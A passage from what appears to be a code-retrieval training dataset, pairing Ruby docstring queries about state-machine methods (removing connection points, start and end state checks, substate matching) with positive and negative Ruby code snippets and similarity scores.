"def +(other)\n `return self + other;`\n end",
"def +(other)\n `return self + other;`\n end",
"def add_address(address)\n @addresses << address\n end",
"def add(name, value = nil)\n symbols << [name.to_s, (Integer(value) if value)]\n end",
"def add(p, set_first = false)\n angle = self.angle(p)\n prior_idx = @neighbors.bsearch_index { |n| self.angle(n) >= angle }\n\n raise \"Point #{p.inspect} is already a neighbor of #{self.inspect}\" if prior_idx && @neighbors[prior_idx] == p\n\n @neighbors.insert(prior_idx || @neighbors.length, p)\n\n @first = p if @first.nil? || set_first\n end",
"def add_new\n self.times_used.unshift(0)\n self.save\n end",
"def add_round_key(state, round_key)\n state = Matrix.build(Nb, Nk) do |row, col|\n state[row, col] ^ round_key[row, col]\n end\n print_state(state, __method__) if DEBUG\n state\n end",
"def add(type)\n @value << type\n @value = @value.uniq\n end"
] |
[
"0.55765295",
"0.54607874",
"0.5139848",
"0.5138874",
"0.504211",
"0.50295275",
"0.49795917",
"0.49791703",
"0.49349418",
"0.4918888",
"0.48471597",
"0.47565934",
"0.47565934",
"0.47565934",
"0.47557563",
"0.47550985",
"0.47549525",
"0.47235757",
"0.47175694",
"0.47154087",
"0.47069126",
"0.46915808",
"0.46711937",
"0.46645337",
"0.46600065",
"0.46524134",
"0.4652322",
"0.4638726",
"0.45977417",
"0.4597115",
"0.45768738",
"0.4569087",
"0.45355994",
"0.45354936",
"0.45223352",
"0.4519889",
"0.45139337",
"0.45095053",
"0.44920325",
"0.44856012",
"0.44814417",
"0.4477048",
"0.44734687",
"0.44643426",
"0.44617188",
"0.44617188",
"0.44497025",
"0.44491652",
"0.44447985",
"0.4444712",
"0.44446218",
"0.44361895",
"0.44262728",
"0.4421441",
"0.44179112",
"0.4417401",
"0.4415284",
"0.43940037",
"0.43828607",
"0.4379975",
"0.43797952",
"0.437901",
"0.43698683",
"0.43677405",
"0.43673137",
"0.43587083",
"0.43549255",
"0.43529713",
"0.43436235",
"0.43419766",
"0.43327218",
"0.43290532",
"0.43289176",
"0.43212378",
"0.43171877",
"0.43168154",
"0.43058276",
"0.42980778",
"0.4298066",
"0.4296636",
"0.4295851",
"0.429449",
"0.4292067",
"0.42890567",
"0.4286773",
"0.4282695",
"0.4276861",
"0.42765817",
"0.42757794",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42708293",
"0.42708293",
"0.42645708",
"0.42530864",
"0.42530677",
"0.4250406",
"0.42484385",
"0.42412305"
] |
0.0
|
-1
|
Removes a Pseudostate from this State.
|
def remove_connectionPoint! s
_log { "remove_connectionPoint! #{s.inspect}" }
@connectionPoint.delete(s)
s.state = nil
# Notify.
s.connectionPoint_removed! self
self
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def delete\n @reg.delete_bits(self)\n self\n end",
"def remove(p)\n @first = counterclockwise(@first) if @first.equal?(p)\n @first = nil if @first.equal?(p)\n @neighbors.delete(p)\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def remove_shape\n\t\t@shapes.delete_at(0)\n\tend",
"def remove shape\n @remove_shapes << shape\n end",
"def clear_state\n @state.clear\n self\n end",
"def unstar\n set_starred_state(false)\n end",
"def remove(el)\n n = word_number(el)\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] &= ~bit_mask(el)\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def remove(value)\n connection.zrem(key_label, value)\n end",
"def remove_payment\n @payment = Payment.find(params[:id])\n @payment.update!(state: 2)\n end",
"def remove\n __flag__ :remove\n end",
"def pop_state\n @state.pop\n end",
"def delete_pid()\n if @pid.ours? then\n @pid.delete()\n end\n end",
"def remove_point(point)\n self.points.delete point\n point.cluster = nil\n end",
"def remove(x, y)\n @store[x, y] = 0\n end",
"def discard_property\n if(object.is_a?(SemanticProperty))\n SemanticProperty.delete(object.id)\n end\n end",
"def ~\n Not.new(self)\n end",
"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def remove_node(index)\n @strat.remove_node(index)\n @ize -= 1\n end",
"def unset(name)\n update(name, nil)\n end",
"def remove_midi_source(source)\n @midi.inputs.delete(source)\n end",
"def op_del(attrname = nil)\n attrname ||= pop\n push pop.dup\n peek.delete(attrname)\n end",
"def unuse(n=1)\n self.used -= n\n end",
"def remove()\n return if @store.empty?\n\n swap(0, @store.length - 1)\n banished = @store.pop\n heap_down(0)\n\n return banished.value\n end",
"def clear\n current_state.clear\n end",
"def uncheck\n self.checked = Time.at(0)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def remove_process!(redis, process_id)\n redis.zrem(key, process_id)\n end",
"def remove\n @instantiations.dup.each(&:remove)\n @instantiations[0..-1] = []\n true\n end",
"def remove_current_spouse\n raise_unless_current_spouse_enabled\n if gclass.perform_validation_enabled\n ex_current_spouse = current_spouse\n current_spouse.current_spouse = nil\n self.current_spouse = nil\n transaction do\n ex_current_spouse.save!\n save!\n end\n else\n transaction do\n current_spouse.update_attribute(:current_spouse,nil)\n self.update_attribute(:current_spouse,nil)\n end\n end\n end",
"def remove_token\n update(token: nil)\n end",
"def remove_house(house)\n @houses.delete(house)\n end",
"def unselect_place\n @selected_place = nil;\n end",
"def remove( *ruleses )\n self.dup.remove!( *ruleses )\n end",
"def unpad!()\n @value = unpad\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def deselect\n select(0, 0)\n end",
"def delete\n self.store -= self\n end",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove_entry(p)\n\t\t@person.delete(p)\n\tend",
"def remove_datapoint(key)\n @redis.srem \"datapoints\", key\n end",
"def remove(num)\n @count -= 1\n self[num].delete(num)\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def remove!(union_type)\n if union_type.is_singleton?\n raise AssertionError.new(\"Union type expected\")\n else\n @types.delete_if do |type|\n union_type.include?(type)\n end\n end\n end",
"def remove_connectionPoint! s\n _log { \"remove_connectionPoint! #{s.inspect}\" }\n\n @ownedMember.delete(s) # ownedElement?!?!\n @connectionPoint.delete(s)\n s.state = nil\n\n # Notify.\n s.connectionPoint_removed! self\n\n self\n end",
"def unset(event)\n key[:schedule].zrem event\n end",
"def delete_pose_index\n self.pose_words.clear if Pose.perform_search?\n end",
"def remove_phone (p)\n phone_numbers.delete_at p\n end",
"def unbind\n #@node.notifiers.unsubscribe(@notify_sid) if @notify_sid\n @node.command_connections.delete(self)\n end",
"def remove_attribute(name)\n `#@native.removeAttribute(name)`\n end",
"def !\n ~self\n end",
"def unmark!\n @session.nickserv.mark(self.name, :off)\n end",
"def clear_flag(symbol)\n @flags.delete(symbol)\n end",
"def remove_at(index)\n self.at(index - 1).next_node = self.at(index + 1)\n self.at(index).next_node = nil\n end",
"def remove\n uninstall_yri\n uninstall_yard\n end",
"def remove(type); end",
"def remove\n @store.shift\n end",
"def inline\n @out.delete(self)\n @in.each do |n|\n i = 0\n while(i < n.out.length)\n n.out[i,1] = @out if n.out[i] == self\n i += 1\n end\n end\n @graph.remove(self)\n end",
"def unset_mask\n @masking_key = nil\n end",
"def unset_mask\n @masking_key = nil\n end",
"def unuse\n @use = nil\n end",
"def unown!(owned)\r\n master_song_relationships.find_by_master_song_owned_id(owned).destroy\r\n end",
"def remove!(name)\n remove_instance_variable to_ivar(name)\n end",
"def remove(host, plataform)\n @plataforms[plataform].rem(host)\n end",
"def pin_clear\n @pinmap.each { |pin_name, pin| pin.destroy }\n @pinmap.clear\n @patternpinindex.clear\n @patternorder.delete_if { true }\n @cycletiming.clear\n 'P:'\n end",
"def remove\n unless self.empty?\n swap(0, @store.length - 1)\n removed_node = @store.pop\n\n heap_down(0)\n\n return removed_node.value\n end\n end",
"def node_remove(node)\n return unless node_present? node\n nodes.delete prepare_key(node)\n end",
"def remove!; end",
"def remove\n @nxt.prv = @prv if @nxt\n @prv.nxt = @nxt if @prv\n end",
"def clear\n @seen.clear\n return self\n end",
"def remove_sprite(tile)\n @source_sprites.delete(tile)\n end",
"def remove_from_hot_list\n self.update_attribute(:added_to_hot_list, nil)\n end",
"def remove_attribute(name)\n `#{@element}.removeAttribute(#{name})`\n end",
"def remove\n node = @head\n\n if node\n @head = node.next_node\n @tail = nil unless @head\n\n node.data\n end\n end",
"def remove()\n removed = @store[0].value\n swap(0, @store.length - 1)\n @store.pop\n heap_down(0)\n return removed\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove_topping(x)\n @toppings.delete_at(x)\n end",
"def remove()\n return if @store.empty?\n last = @store.length - 1\n curr = 0\n swap(last, curr)\n removed = @store.pop\n heap_down(curr)\n return removed.value\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def removed_blip_id # :nodoc:\n @properties['removedBlipId'].dup\n end",
"def destroy\n super\n parent.unlist_item(@sym)\n end",
"def unshare!( user )\n save if unshare( user )\n end",
"def remove_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,bool=c$Element.__boolean_attributes__[attr],key=c$Element.__boolean_attributes__[attr]||bool`\n `key ? el[key]=bool?false:'' : el.removeAttribute(attr)`\n return self\n end",
"def remove_player p\n (@players ||= []).delete p.sym\n end",
"def subtract_in_place(a)\n if ((a).nil?)\n return\n end\n # for all words of 'a', turn off corresponding bits of 'this'\n i = 0\n while i < @bits.attr_length && i < a.attr_bits.attr_length\n @bits[i] &= ~a.attr_bits[i]\n i += 1\n end\n end",
"def remove node\n # if the node is at beginning or end of list\n # handle this separately\n return remove_first if node.prev_node == nil\n return remove_last if node.next_node == nil\n\n # tell adjacent nodes to 'skip' over this node\n node.next_node.prev_node = node.prev_node\n node.prev_node.next_node = node.next_node\n\n # store the data, so we can return it\n data = node.data\n\n # send to garbage collector\n node.data = nil\n node = node.prev_node = node.next_node = nil\n\n @size -= 1\n\n return data\n end",
"def delete(attribute)\n `c$Element.prototype.m$remove_style.call(#{@element},attribute)`\n end",
"def delete!\n owner.delete_pin(myself)\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def unstar_note(id)\n n = ActiveMetadata::Note.find(id)\n update_note id, n.note, starred: false\n end",
"def erase\n @nodes.erase\n end",
"def remove()\n \n swap(0, @store.length - 1)\n removed = @store.pop()\n \n heap_down(0) unless @store.empty?\n \n return removed.value\n end",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend"
] |
[
"0.5979717",
"0.57304233",
"0.5560445",
"0.55487865",
"0.5495755",
"0.5405134",
"0.5283976",
"0.517858",
"0.5133871",
"0.50205034",
"0.5016034",
"0.5005394",
"0.4989734",
"0.49844682",
"0.49639606",
"0.49639606",
"0.4957162",
"0.49231005",
"0.49088806",
"0.4907291",
"0.4901876",
"0.4895004",
"0.48906857",
"0.48862952",
"0.4851609",
"0.4820739",
"0.4808517",
"0.47999775",
"0.47618857",
"0.4754496",
"0.47340605",
"0.47338092",
"0.47265652",
"0.47074366",
"0.46909067",
"0.46805468",
"0.46730104",
"0.46720392",
"0.46566513",
"0.4655281",
"0.46509388",
"0.46506253",
"0.46421364",
"0.463791",
"0.46333283",
"0.46303853",
"0.46267685",
"0.4625886",
"0.4624491",
"0.4623992",
"0.46206868",
"0.46160027",
"0.46155107",
"0.46090096",
"0.46079767",
"0.46049643",
"0.46041352",
"0.46022084",
"0.45948097",
"0.45916745",
"0.4590719",
"0.4579773",
"0.4576391",
"0.45760465",
"0.45749283",
"0.45736304",
"0.4570448",
"0.4570448",
"0.45675",
"0.45654142",
"0.45615342",
"0.45590678",
"0.45577243",
"0.4555285",
"0.45509636",
"0.4550716",
"0.45453498",
"0.45431122",
"0.45375124",
"0.45370623",
"0.4534309",
"0.45322156",
"0.45293316",
"0.4524288",
"0.45229962",
"0.45166796",
"0.45157367",
"0.4514776",
"0.4514467",
"0.45129284",
"0.45121977",
"0.45107323",
"0.45105094",
"0.45100147",
"0.45096412",
"0.45091748",
"0.4502276",
"0.45018318",
"0.44974202",
"0.4496583",
"0.449171"
] |
0.0
|
-1
|
Returns true if this a start state.
|
def start_state?
@state_type == :start
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def started?\n @state == STATE_STARTED\n end",
"def running?\n @state == :started\n end",
"def start?\r\n start\r\n end",
"def started?\n @started\n end",
"def started?\n @started\n end",
"def started?\n @state != :created\n end",
"def started?\n !@start_time.nil?\n end",
"def started?\n\t\tif self.timer == nil\n\t\t\treturn false\n\t\tend\n\t\treturn self.timer.status == \"--running--\"\n\tend",
"def is_start?\n type == TYPES[:start]\n end",
"def can_start?\n status.in? [Status::NOT_STARTED, Status::IN_PROGRESS]\n end",
"def start?\n @opts[:start]\n end",
"def started?\n status['Running']\n end",
"def started? # :nodoc:\n @started\n end",
"def started?\n !stopped?\n end",
"def started?\n !stopped?\n end",
"def started?\n !stopped\n end",
"def has_started?\n Time.now >= start_time\n end",
"def started?\n !self.started_at.nil?\n end",
"def started?\n !game_over? && status == Game::RUNNING && started_at.present?\n end",
"def started?\n @main_generator.started?\n end",
"def started?\n @stop.nil? ? false : !@stop\n end",
"def started?\n !@time_started.nil?\n end",
"def is_started?\n\t\treturn self.pid ? true : false\n\tend",
"def started?\n\t\t\t!@thread.nil? && @thread.alive?\n\t\tend",
"def startable?\n status.to_sym.in? [:pending]\n end",
"def start_node?\n @traversal_position.isStartNode\n end",
"def running?\n @state == :running\n end",
"def not_started?\n if self.status == self.statuses[\"Not started\"]\n return true\n end\n return false\n end",
"def started?\n @continue\n end",
"def running?\n (state == :running)\n end",
"def started?\n @worker.started?\n end",
"def started?\n @module_started\n end",
"def started?\n backend.started?\n end",
"def started?\n status == 'Running' || status =~ /Complete/\n end",
"def running?\n started? && !finished?\n end",
"def is_started\n self.set_at < DateTime.current\n end",
"def starting?\n if connection_in_info?\n status.queued? && !connect.to_h.compact.empty?\n else\n status.running? && !connect_file.file?\n end\n end",
"def start_step?\n params_hash[\"start\"]\n end",
"def running?\n @lock.synchronize { defined?(@start_time) } && !done?\n end",
"def started?\n !!@pid\n end",
"def running?\n return false if state.nil?\n \"running\".casecmp(state).zero?\n end",
"def running?\n status.running? && !starting?\n end",
"def startable?\n\t\treturn false if self.key_name.blank? || self.instance_type.blank? || self.image_id.blank? || self.security_groups.nil?\n\t\treturn true\n\tend",
"def running?\n started? && !dead?\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def running?\n runtime_state?(peek_current_state)\n end",
"def started?\n started_at.present?\n end",
"def start\n true\n end",
"def running?\n @running && !@stopping\n end",
"def started?\n begin\n ping\n return true\n rescue => ex\n return false\n end\n end",
"def running_here?\n !idle? && @self_started\n end",
"def has_started?\n Date.current >= start_date\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def update_startlock?\r\n # When waiting for event execution or locked\r\n return (@starting or lock?)\r\n end",
"def start_list?\n uses_lane_assignments? || compete_in_order? || start_data_type == \"Mass Start\"\n end",
"def game_has_started?\n game.move > 0\n end",
"def can_start?\n true\n end",
"def started?\n !@pid.nil? && @pid > 0\n end",
"def for_startup?\n self.stage_id > 1\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def initiative_started?\n find_init.present?\n end",
"def flag_start?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_START == TAC_PLUS_ACCT_FLAG_START)\n return(false)\n end",
"def authentication_start?\n return true if (self.kind_of?(AuthenticationStart))\n return false\n end",
"def in_progress?\n if current_state =~ /\\A(started|finished|delivered)\\Z/\n true\n else\n false\n end\n end",
"def running?\n @running.true?\n end",
"def started?\n self.class.data_attributes.any?{|a| send(:\"#{a}?\")}\n end",
"def has_started?\n historic_velocity.any? do |velocity|\n velocity != 0\n end\n end",
"def help_start?\n @show_help =~ /start/i\n end",
"def perform_initial_transition?\n !current_state\n end",
"def starting?; event(:start).pending? end",
"def running?\n\t\t\t@status == :running\n\t\tend",
"def running?\n self.status == STATUS_RUNNING\n end",
"def running?\n spawned? and !@status and alive?\n end",
"def already_started?\n if started?\n ::NewRelic::Agent.logger.error('Agent Started Already!')\n true\n end\n end",
"def auto_start?\n autostart\n end",
"def start?\n @cursor == 0\n end",
"def app_starting?\n @launching\n end",
"def aasm_states_to_check\n started? || aasm_event == 'start' || ignore_states\n end",
"def is_running?\n @running\n end",
"def is_ready_to_start?\n self.is_owner? ? self.ack_get_started_owner : ack_get_started_user\n end",
"def started?\n @left_generator.started? || @right_generator.started?\n end",
"def started?\n @left_generator.started? || @right_generator.started?\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @run\n end",
"def is_running?\n return @running\n end",
"def start\n @started_at ? false : @started_at = Time.now\n end",
"def is_running?\n return @running\n end",
"def start_list_present?\n if uses_lane_assignments?\n lane_assignments.any?\n elsif compete_in_order?\n order_finalized?\n elsif start_data_type == \"Mass Start\"\n wave_numbers.any?\n else\n false\n end\n end",
"def running?\n 'Running' == self.status\n end",
"def running?\n return @running\n end"
] |
[
"0.8546305",
"0.8046395",
"0.7930488",
"0.78981346",
"0.78981346",
"0.78764534",
"0.7728927",
"0.7708898",
"0.7657222",
"0.76489013",
"0.7647868",
"0.7639584",
"0.7617122",
"0.75985754",
"0.75985754",
"0.7503758",
"0.7485786",
"0.744257",
"0.74422014",
"0.74149424",
"0.7367861",
"0.73318094",
"0.7330505",
"0.7317995",
"0.7288117",
"0.7280625",
"0.7246501",
"0.7237794",
"0.7221039",
"0.7186769",
"0.7177892",
"0.71342146",
"0.7109121",
"0.709057",
"0.7086949",
"0.7040785",
"0.70310354",
"0.70263",
"0.70260966",
"0.7013254",
"0.70067036",
"0.7002907",
"0.6986708",
"0.69667524",
"0.6934591",
"0.6909198",
"0.68913966",
"0.6889794",
"0.68845147",
"0.688269",
"0.6858948",
"0.6858666",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.6826477",
"0.68026406",
"0.6796175",
"0.6790928",
"0.6788892",
"0.67882115",
"0.6783193",
"0.6783193",
"0.6783193",
"0.6783193",
"0.6778052",
"0.6772872",
"0.6759718",
"0.675459",
"0.67445445",
"0.6740221",
"0.67364925",
"0.67201185",
"0.6718635",
"0.6710575",
"0.6701255",
"0.66870445",
"0.6686228",
"0.668456",
"0.6677973",
"0.66778743",
"0.6676967",
"0.66754127",
"0.6663629",
"0.6662332",
"0.6654538",
"0.6654538",
"0.66488266",
"0.66488266",
"0.6643713",
"0.6641678",
"0.66370517",
"0.6628133",
"0.6616423",
"0.661293",
"0.66025865"
] |
0.91267204
|
0
|
Returns true if this an end state.
|
def end_state?
@state_type == :end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ended?\n\t\t\tstate == 'ended'\n\t\tend",
"def end?\n @status == :end\n end",
"def ended?\n !!@ended\n end",
"def ended?\n @ended\n end",
"def ended?\n !!@finished && !transition?\n end",
"def ended?\n return(self.ends_at < Time.now)\n end",
"def ended?\n end_time < Time.now.utc\n end",
"def final_state?\n current_state == final_state\n end",
"def ending?\n active? && !canceled_at.nil?\n end",
"def finished?\n @state == STATE_FINISHED\n end",
"def finished?\n @state == :finished\n end",
"def finished?\n sold_out? or ended?\n end",
"def finished?\n @end_time != nil\n end",
"def ended?\n ended_at.present?\n end",
"def at_end?\n peek.type == :eof\n end",
"def end?\r\n\t\tif(@allLines.empty?)\r\n\t\t\treturn true\r\n\t\telse\r\n\t\t\treturn false\r\n\t\tend\r\n\tend",
"def game_ended?\n\t\treturn @game_ended\n\t end",
"def end?()\n END_MARKER.equal? _next_element\n end",
"def terminated?\n self.state.name == \"terminated\"\n end",
"def is_end_game?\n @status= \"End\"\n return @board.over?\n end",
"def finished?\n return false unless self.started?\n return true if self.finished\n return ( self.finished_at.time <= Time.now )\n end",
"def finished?\n return false unless self.started?\n return true if self.finished\n return ( self.finished_at.time <= Time.now )\n end",
"def finished\n if (start?) and (end?)\n return true\n else\n return false\n end\n end",
"def finished?\n !!self.ended_at\n end",
"def finished?\n if self.status == self.statuses[\"Finished\"]\n return true\n end\n return false\n end",
"def animation_end?\n return false if @watch_sprite_animation.nil?\n return @watch_sprite_animation.animation_end?\n end",
"def ended?\n\t\tself.round >= self.rounds and checkedout_matches.empty? and available_matches.empty?\n\tend",
"def stopped?\n !@end_time.nil?\n end",
"def isAtEnd\n return @index >= (@actions.size - 1)\n end",
"def has_ended?\n Time.now >= end_time\n end",
"def end_of_tie?\n true\n end",
"def game_end (board)\n (horizontal_line(board) || vertical_line(board) ||\n diagonal_line(board) || full_board(board)) ? true : false\n end",
"def is_finish?\n type == TYPES[:finish]\n end",
"def game_end?\n end_game if self.age >= max_age\n end",
"def is_end?(cell)\n @end_cell.eql?(cell)\n end",
"def end?\n @cursor == @text.length\n end",
"def end?\n @cursor == @text.length\n end",
"def completed?\n @state.to_s =~ /finished|aborted|failed/\n end",
"def end?\n players.any?(&:bankrupt?)\n end",
"def last_phase?\n @finishing\n end",
"def job_ended?\n FINAL_JOB_TASK_STATUSES.include?(@task_status)\n end",
"def move_end?\n @move_end || !@start_move\n end",
"def done?\n @state == :done\n end",
"def end_state?\n not player_alive?(Player1) or not player_alive?(Player2)\n end",
"def check_end_status\n\t\t\tif @board.winning_condition?(@player) || @board.winning_condition?(@ai) ||\n\t\t\t@board.get_available_positions == []\n\t\t\t\treturn true\n\t\t\telse\n\t\t\t\treturn false\n\t\t\tend\n\t\tend",
"def end_game?\n @@cards.each do |card|\n return false if card.up == true\n end\n true\n end",
"def finished?\n\t\tif @finished.nil? then\n\t\t\tfalse\n\t\telse\n\t\t\t@finished\n\t\tend\n\tend",
"def ended?\n\t\tended = false\n\t\tended = true if(!(@fill_in_word.include? \"_\") || @guesses <= 0)\n\t\tended\n\tend",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def closed?\n state == :closed\n end",
"def closed?\n\t\t\t\t@state == :closed || @framer.nil?\n\t\t\tend",
"def finished?\n\t\t\tif @finished.nil? then\n\t\t\t\tfalse\n\t\t\telse\n\t\t\t\t@finished\n\t\t\tend\n\t\tend",
"def finished?\n !!@finished\n end",
"def final_state?(curr_state = nil, **)\n next_state(curr_state).blank?\n end",
"def finished?\n FINAL_STATUSES.include?(transaction_status) || status == COMPLETED\n end",
"def end_element?\n @contents[0] == :end_element\n end",
"def finalized?\n self.state != STATE_NEW\n end",
"def finished?\n self.status == STATUS_FINISHED\n end",
"def complete?\n return state == \"complete\"\n end",
"def finished?\n self.closed?()\n end",
"def finished?\n true unless self.finished_on.nil?\n end",
"def termination?\n false\n end",
"def finished?\n @status[:description] == :finished\n end",
"def pairing_ended?\n end_pairing_on.nil? ? false : (end_pairing_on < DateTime.now)\n end",
"def finished?\n finished = nil\n active_item_orders = item_orders.where(active: true)\n if state_reached?(:fulfilled)\n if active_item_orders.length == 0\n finished = true\n else\n active_item_orders.each do |io|\n i = io.item\n if !i.obsolete\n last_transition = i.state_transitions.where(order_id: id).first\n\n if last_transition && (last_transition.to_state == i.final_state.to_s)\n finished = true\n else\n finished = false\n break\n end\n end\n end\n end\n end\n finished\n end",
"def exclude_end?\n @exclude_end\n end",
"def final?\n @finals.include? @state\n end",
"def end_of_stream?\n @next_chunk.nil?\n end",
"def ended\n !!(cancelled && !on_grace_period)\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def complete?\n self.state == 'complete'\n end",
"def finished?\n @step == @total_steps + 1\n end",
"def final_situation?(sit)\n if sit.index == @tape.length\n return true if @final_states.include? sit.state\n end\n false\n end",
"def finished?\n attributes['isFinished']\n end",
"def finished?\n @hand_history.last_action_on_current_street.type == :fold || ( @hand_history.actions[:river].count > 1 && ( @hand_history.last_action_on_current_street.check? || @hand_history.last_action_on_current_street.call? ) )\n end",
"def dot_is_end?\n @rule.right_tokens.count == @pos_index\n end",
"def stopped?\n @state == :stopped\n end",
"def in_progress?\n ended_at.nil?\n end",
"def halted?\n @current >= (@size - 1)\n end",
"def finished?\r\n @finished ||= false\r\n end",
"def last?\n position == bottom\n end",
"def terminated?\n !! @status\n end",
"def end?\n\t\twin?(\"x\") || win?(\"o\") || @board.count(\"-\") == 0\n\tend",
"def shutdown?\n stopped_event.set?\n end",
"def shutdown?\n stopped_event.set?\n end",
"def next_turn?\n @status != :end\n end",
"def finished?\n @finished == true\n end",
"def finished?\n current_step > 1 && current_step >= game_length + 1\n end",
"def finished?\n\n end",
"def last?\n not last.nil?\n end",
"def end?\n @color == @@colors[:red]\n end",
"def final?\n @transitions.empty?\n end",
"def finished?\n !new? && !processing?\n end",
"def terminated?\n terminated\n end",
"def finished?\n FINISHED_STATUSES.include? status or tasks_are_finished?\n end"
] |
[
"0.8354746",
"0.8338693",
"0.7862258",
"0.78419566",
"0.76578397",
"0.76541805",
"0.7490499",
"0.7454582",
"0.74293077",
"0.7343483",
"0.7333606",
"0.7327331",
"0.73170483",
"0.72842264",
"0.72469896",
"0.72145516",
"0.71146953",
"0.70591986",
"0.70328486",
"0.70161873",
"0.7010585",
"0.7010585",
"0.7003674",
"0.69983155",
"0.69717467",
"0.6966808",
"0.6909969",
"0.6900583",
"0.68997926",
"0.6883923",
"0.6877242",
"0.68699753",
"0.6864742",
"0.6846772",
"0.6838202",
"0.6818933",
"0.6818933",
"0.6815084",
"0.68099034",
"0.6800192",
"0.67992705",
"0.67915994",
"0.6776982",
"0.67608833",
"0.6757581",
"0.6727086",
"0.6725008",
"0.6721145",
"0.67118466",
"0.67118466",
"0.67118466",
"0.670774",
"0.67044926",
"0.66922694",
"0.6689732",
"0.6675322",
"0.66515636",
"0.6644576",
"0.66204464",
"0.6582603",
"0.65750796",
"0.6553048",
"0.6550124",
"0.6548626",
"0.6544328",
"0.6543217",
"0.65303546",
"0.6527878",
"0.6527785",
"0.65203124",
"0.65177166",
"0.65111196",
"0.65111196",
"0.65111196",
"0.65111196",
"0.650902",
"0.6495535",
"0.6490513",
"0.64859915",
"0.64674866",
"0.64668304",
"0.64665836",
"0.64644504",
"0.6458881",
"0.6458453",
"0.6455187",
"0.64473283",
"0.64286685",
"0.6423818",
"0.6423818",
"0.64224714",
"0.64138484",
"0.64044607",
"0.6403455",
"0.640179",
"0.63977116",
"0.6394495",
"0.6392796",
"0.6388883",
"0.6386785"
] |
0.89814514
|
0
|
Returns true if this State matches x or is a substate of x.
|
def === x
# $stderr.puts "#{self.inspect} === #{x.inspect}"
case x
when self.class
self.is_a_substate_of?(x)
else
super
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def is_a_superstate_of? x\n x.ancestors.include?(self)\n end",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def state?(state)\n @state == state\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def state?(state)\n @_state == state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state?(state)\n @states.key?(state)\n end",
"def ==(x)\n self.equal? x\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def ==(x)\n if !x.is_a?(self.class)\n false\n else\n if empty?\n x.empty?\n else\n !x.empty? && head == x.head && tail == x.tail\n end\n end\n end",
